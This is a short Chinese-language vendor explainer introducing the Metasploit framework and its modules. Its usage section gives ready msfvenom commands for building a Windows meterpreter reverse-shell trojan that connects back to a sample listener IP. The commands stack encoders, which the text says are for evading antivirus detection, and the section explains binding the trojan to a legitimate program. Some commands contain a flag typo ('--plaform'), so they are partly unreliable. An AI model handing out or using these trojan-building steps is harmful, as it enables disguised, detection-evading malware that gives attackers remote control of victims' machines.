标题：漏洞扫描大科普之漏洞扫描工具

副标题：漏洞扫描工具Metasploit介绍（开云安全服务）

漏扫工具Metasploit简介： 

当前信息安全与渗透测试领域流行的术语，是一款开源工具，由Ruby语言编写的渗透测试框架,具有可扩展性,数据库使用的是Postgresql数据库。通过它很容易获取、开发并对计算机软件漏洞实施攻击。是本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

Metasploit提供了测试接口，例如控制台、web、Cli等接口形式。Metasploit还有第三方程序接口，例如Nmap、SQLMap等。

Metasploit的常用模块及介绍：1、Auxiliaries(辅助模块)：常用来负责执行扫描、嗅探、指纹识别等辅助渗透测试功能的模块。2、Exploit(漏洞利用模块):里面包含了针对操作系统等一些漏洞指定的POC漏洞代码验证。3、Payload(攻击载荷模块):主要负责一些后渗透攻击、4、Encoders(编程工具模块):常用来负责免杀,防止安全软件及硬件设备检测出来。

漏扫工具Metasploit使用方式：

以生成windows木马为例：

Msf木马模块参数介绍（msfpayload+msfencode）： 

-a x86 //架构，例如x86  

--platform windows //指定系统平台

-p windows/meterpreter/reverse_tcp //指定playload模块

LHOST= //shell反弹对象

IP(本机IP) LPORT= //本机监听端口

-b "\x00" //去掉生成木马中的空字符

-e x86/shikata_ga_nai //指定编码器

-i N //指定编码的次数，次数越大，生成的文件越大

-x 文件名 //将木马与指定文件绑定在一起，， 例如 如果想将软件跟木马绑定在一起

-f exe //生成文件的类型

-o /路径/文件名 //输出到的文件名

使用编码器生成一个window平台木马:

msfvenom -a x86 --plaform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.190.130 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 -f exe -o /root/1.exe

使用两个编码器组合编码生成windows木马

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=本机监听端口 -b "\x00" -e x86/编码器 -i N | msfvenom -a x86 --plaform windows -e x86/alpha_upper -i 10 -f exe -o /输出文件地址